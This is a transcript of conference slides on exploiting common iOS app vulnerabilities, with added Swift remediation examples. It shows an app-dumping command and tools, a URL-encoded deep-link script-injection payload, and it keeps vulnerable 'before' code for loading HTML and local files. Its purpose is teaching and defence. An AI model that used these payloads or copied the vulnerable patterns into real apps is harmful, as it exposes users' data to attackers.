
Exploiting Common iOS Apps’ Vulnerabilities

Video and slides synchronized, mp3 and slide download available at URL https://bit.ly/2xQjjXl.

Ivan Rodriguez walks through some of the most common vulnerabilities in iOS apps and shows how to exploit them. All of these vulnerabilities were found in real production apps of companies that have (or don't have) a bug bounty program. This talk is useful for anyone involved in mobile app development, and for anyone who uses mobile apps to work with sensitive data. Filmed at qconsf.com.

Ivan Rodriguez is a Software Engineer at Google by day and a security researcher at night. He has found many vulnerabilities in different mobile applications and reported them through the popular bug bounty platforms HackerOne and Bugcrowd. He worked for many years as a mobile developer before changing his career and focusing on application security.


Exploiting Common iOS Apps’ Vulnerabilities

  1. Common Vulnerabilities on iOS Apps, by Ivan R, QConSF @ivRodriguezCA
  2. InfoQ.com: News & Community Site • Over 1,000,000 software developers, architects and CTOs read the site worldwide every month • 250,000 senior developers subscribe to our weekly newsletter • Published in 4 languages (English, Chinese, Japanese and Brazilian Portuguese) • Post content from our QCon conferences • 2 dedicated podcast channels: The InfoQ Podcast, with a focus on Architecture, and The Engineering Culture Podcast, with a focus on building • 96 deep dives on innovative topics packed as downloadable emags and minibooks • Over 40 new content items per week. Watch the video with slide synchronization on InfoQ.com! https://www.infoq.com/presentations/exploiting-ios-vulnerabilities/
  3. Purpose of QCon - to empower software development by facilitating the spread of knowledge and innovation. Strategy - practitioner-driven conference designed for YOU: influencers of change and innovation in your teams - speakers and topics driving the evolution and innovation - connecting and catalyzing the influencers and innovators. Highlights - attended by more than 12,000 delegates since 2007 - held in 9 cities worldwide. Presented at QCon San Francisco www.qconsf.com
  4. (image-only slide)
  5. DISCLAIMER: the views and opinions expressed in this talk are solely my own and do not reflect the views or opinions of my employer.
  6. ivan_rodriguez.me • security researcher and software engineer • focused on iOS reverse engineering and mobile bug bounty programs • I blog at ivrodriguez.com • find me on Twitter: @ivRodriguezCA • find me on GitHub: /ivRodriguezCA
  7. agenda • reverse engineering an iOS app. • tools and methods. • common iOS vulnerabilities (all found in real-world applications). • how to fix and prevent these vulnerabilities. • resources / conclusions. • questions.
  8. reverse engineering an iOS app • iOS apps are encrypted with an algorithm called FairPlay. • we need a jailbroken device. • we don't "decrypt" the apps, we just dump them from memory. • transfer them to a desktop where we do the reverse engineering.
  9-10. reverse engineering an iOS app • how do we dump the app from memory? > dump memory <filename> <start_address> <end_address> • we can use tools to automate this.
  11. reverse engineering an iOS app • some of the tools we can use: - dumpdecrypted: https://github.com/stefanesser/dumpdecrypted - bfinject: https://github.com/BishopFox/bfinject - frida-ios-dump: https://github.com/AloneMonkey/frida-ios-dump
  12-14. reverse engineering an iOS app (image-only slides)
  15-17. reverse engineering an iOS app • dynamic and static analysis (image-only slides)
  18. vulnerability # 1 • searching through embedded files within the app
  19. vulnerability # 1 (image-only slide)
  20-21. vulnerability # 1 • private_key (yes, a PRIVATE key)
  22-24. vulnerability # 1 • cloud server (image-only slides)
  25-26. vulnerability # 1 • cloud server • ssh !
  27-30. how to fix vulnerability # 1 • cloud server • own server (image-only slides)
  31. how to fix vulnerability # 1 • cloud server • own server • public api
  32-33. how to fix vulnerability # 1 • cloud server • own server • ssh
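The finding on slides 18-26 was a private SSH key shipped inside the app bundle. The script below is an added example, not part of the talk or of the author's RE-iOS-Apps material: it walks an extracted .app directory and exits non-zero when any file carries a PEM private-key header, so the same check that a researcher runs after dumping the app can gate a release build instead. The marker list and the usage path are constructed for this example.

```swift
import Foundation

// PEM headers that identify key material. Constructed list for this
// example; extend it with whatever secret formats your app might embed.
let secretMarkers = [
    "-----BEGIN RSA PRIVATE KEY-----",
    "-----BEGIN OPENSSH PRIVATE KEY-----",
    "-----BEGIN EC PRIVATE KEY-----",
    "-----BEGIN PRIVATE KEY-----",
]

// Walks an extracted .app directory and returns every file that contains
// one of the markers, together with the marker that matched.
func findEmbeddedSecrets(in bundlePath: String) -> [(file: String, marker: String)] {
    var hits: [(file: String, marker: String)] = []
    let fm = FileManager.default
    guard let walker = fm.enumerator(atPath: bundlePath) else { return hits }
    for case let relative as String in walker {
        let full = (bundlePath as NSString).appendingPathComponent(relative)
        var isDir: ObjCBool = false
        guard fm.fileExists(atPath: full, isDirectory: &isDir), !isDir.boolValue,
              let data = fm.contents(atPath: full) else { continue }
        // PEM markers are ASCII, so a lossy UTF-8 decode is enough to find
        // them in .pem files, plists, or strings baked into the binary.
        let text = String(decoding: data, as: UTF8.self)
        for marker in secretMarkers where text.contains(marker) {
            hits.append((file: relative, marker: marker))
            break
        }
    }
    return hits
}

// Usage (assumed path): swift find_secrets.swift Payload/App.app
if CommandLine.arguments.count > 1 {
    let results = findEmbeddedSecrets(in: CommandLine.arguments[1])
    if results.isEmpty {
        print("no private-key markers found")
    } else {
        for hit in results { print("\(hit.file): \(hit.marker)") }
        exit(1)   // fail the CI step so the key never ships
    }
}
```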
  34-39. vulnerability # 2 (image-only slides)
  40. vulnerability # 2 • coinza://news/<trusted-html>
  41-42. vulnerability # 2 • coinza://news/<trusted-html> - <html><body><script>document.location = 'https://en.wikipedia.org/wiki/URL_redirection';</script></body></html> • URL-encoded: coinza://news/%3Chtml%3E%3Cbody%3E%3Cscript%3Edocument.location%20%3D%20%27https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FURL_redirection%27%3B%3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E
  43-44. how to fix vulnerability # 2 (image-only slides)
  45. how to fix vulnerability # 2 • URL Schemes + WebViews are dangerous and you should be careful when you pair them. • don't load HTML code from user-controlled content. • if you need to dynamically react to URL Schemes, have a set of whitelisted actions.
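Slide 45's whitelisted-actions advice, as an added Swift example that is not code from the talk or from the affected app. The coinza:// scheme and the news/settings hosts are assumptions modelled on the coinza://news/... link above; the parser accepts only known (host, path) shapes and yields an action the app performs itself, so the markup-carrying link from slide 42 is rejected before any WebView is involved.

```swift
import Foundation

// The only things the app will do when opened through its URL scheme.
// A deep link selects one of these; it never supplies markup to render.
enum DeepLinkAction: Equatable {
    case openNews(articleID: String)
    case openSettings
}

// Assumed scheme and hosts for this example. Only the listed
// (host, path shape) pairs are accepted; everything else is dropped.
func parseDeepLink(_ url: URL) -> DeepLinkAction? {
    guard url.scheme?.lowercased() == "coinza",
          let comps = URLComponents(url: url, resolvingAgainstBaseURL: false),
          let host = comps.host?.lowercased() else {
        return nil
    }
    // URLComponents.path is already percent-decoded, so the encoded
    // "<html>..." payload from slide 42 arrives here as literal markup.
    let segments = comps.path.split(separator: "/")
    switch (host, segments.count) {
    case ("news", 1):
        let id = String(segments[0])
        // Article IDs are short opaque tokens issued by the backend.
        let wellFormed = !id.isEmpty && id.count <= 32 &&
            id.allSatisfy { $0.isLetter || $0.isNumber || $0 == "-" }
        return wellFormed ? .openNews(articleID: id) : nil
    case ("settings", 0):
        return .openSettings
    default:
        return nil
    }
}

// The pattern the talk found: whatever follows "coinza://news/" is treated
// as the HTML body. Kept as the "before" form; parseDeepLink replaces it.
func htmlFromDeepLink(_ url: URL) -> String? {
    guard url.host == "news" else { return nil }
    return String(url.path.dropFirst())   // caller-controlled markup
}

// Constructed checks for this example.
let benign = URL(string: "coinza://news/article-42")!
let redirect = URL(string: "coinza://news/%3Chtml%3E%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fexample.com%27%3C%2Fscript%3E%3C%2Fhtml%3E")!
assert(parseDeepLink(benign) == .openNews(articleID: "article-42"))
assert(parseDeepLink(redirect) == nil)
assert(htmlFromDeepLink(redirect)?.hasPrefix("<html>") == true)
```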
  46-50. vulnerability # 3 (image-only slides)
  51. vulnerability # 3 • == ?
  52. vulnerability # 3 ✅
  53. vulnerability # 3 🛑
  54. vulnerability # 3 🛑 🚫
  55. vulnerability # 3 🛑 ✅
  56. vulnerability # 3 🛑 website.com
  57. vulnerability # 3 🛑 username/password
  58-60. vulnerability # 3 🛑 (image-only slides)
  61. vulnerability # 3 • detected connection to a website
  62. vulnerability # 3 • creates fake TLS certificate
  63. vulnerability # 3 • sniffs client traffic
  64. how to fix vulnerability # 3 • vet and test your 3rd-party frameworks, especially if they handle your network requests. • be careful when implementing your own certificate validation logic. • if you want to implement HPKP you can use TrustKit: - https://github.com/datatheorem/TrustKit
  65. how to fix vulnerability # 3 (image-only slide) source: https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet.html
  66-70. vulnerability # 4 (image-only slides)
  71. vulnerability # 4 • these methods are equivalent for local files
  72. vulnerability # 4 (image-only slide)
  73. vulnerability # 4 • file: sqlcipher.db • path: Documents/
  74. vulnerability # 4 • send file to a remote location.
  75. vulnerability # 4 • coinza://news/ (the URL-encoded HTML payload that followed is omitted)
  76. (image-only slide)
  77. how to fix vulnerability # 4 • do not use UIWebView anymore, use WKWebView instead. • if you absolutely have to use UIWebView: - do not use - (void)loadRequest:(NSURLRequest *)request for local files. - use - (void)loadHTMLString:(NSString *)string baseURL:(NSURL *)baseURL with a URL object created with [NSURL URLWithString:@"about:blank"].
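Slide 77's fix, as an added Swift example that is not code from the talk or from the affected app: a WKWebView that renders the app's own article HTML without giving the page a file:// origin, beside the UIWebView loadRequest: form the slide says to avoid. The view controller and resource names are assumed.

```swift
import UIKit
import WebKit

// Shows the app's own news HTML (fetched over HTTPS or bundled) without
// handing the page a file:// origin, so script inside it cannot read the
// sandbox (Documents/sqlcipher.db in the talk) through XMLHttpRequest.
final class SafeNewsViewController: UIViewController {
    private let webView = WKWebView(frame: .zero, configuration: WKWebViewConfiguration())

    override func viewDidLoad() {
        super.viewDidLoad()
        webView.frame = view.bounds
        webView.autoresizingMask = [.flexibleWidth, .flexibleHeight]
        view.addSubview(webView)
    }

    // HTML string with an opaque base URL: document.URL is about:blank, so
    // relative requests do not resolve into the app container.
    func showHTML(_ html: String) {
        webView.loadHTMLString(html, baseURL: URL(string: "about:blank"))
    }

    // One bundled file: passing the file itself as allowingReadAccessTo:
    // restricts what the page may read to that file, not to the whole
    // bundle or to Documents/.
    func showBundledArticle(named name: String) {
        guard let fileURL = Bundle.main.url(forResource: name, withExtension: "html") else { return }
        webView.loadFileURL(fileURL, allowingReadAccessTo: fileURL)
    }
}

// The "before" form from the talk: a UIWebView file load. document.URL then
// reveals the sandbox path and sibling files are readable as same-origin,
// which is what the slide 75 payload relied on.
func legacyShow(fileURL: URL, in webView: UIWebView) {
    webView.loadRequest(URLRequest(url: fileURL))   // vulnerable for local files
}

// UIWebView mitigation for code that cannot migrate yet: loadHTMLString
// with an about:blank base, never loadRequest: on a file: URL.
func legacyShowHTML(_ html: String, in webView: UIWebView) {
    webView.loadHTMLString(html, baseURL: URL(string: "about:blank"))
}
```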
  78. conclusions • add security assessments to your release cycles. • keep your 3rd-party libraries up to date. • be careful copy-pasting code from online sources. • have a public bounty program, or at least public channels for responsible disclosure.
  79. resources • OWASP - Mobile Application Security Verification Standard https://github.com/OWASP/owasp-masvs • OWASP - The Mobile Security Testing Guide https://github.com/OWASP/owasp-mstg • Resources page of my course https://github.com/ivRodriguezCA/RE-iOS-Apps/blob/master/Resources.md
  80. resources • for a more detailed guide visit: https://github.com/ivRodriguezCA/RE-iOS-Apps
  81-82. (image-only slides)
  83. questions?
  84. thank you!
  85. Watch the video with slide synchronization on InfoQ.com! https://www.infoq.com/presentations/exploiting-ios-vulnerabilities/
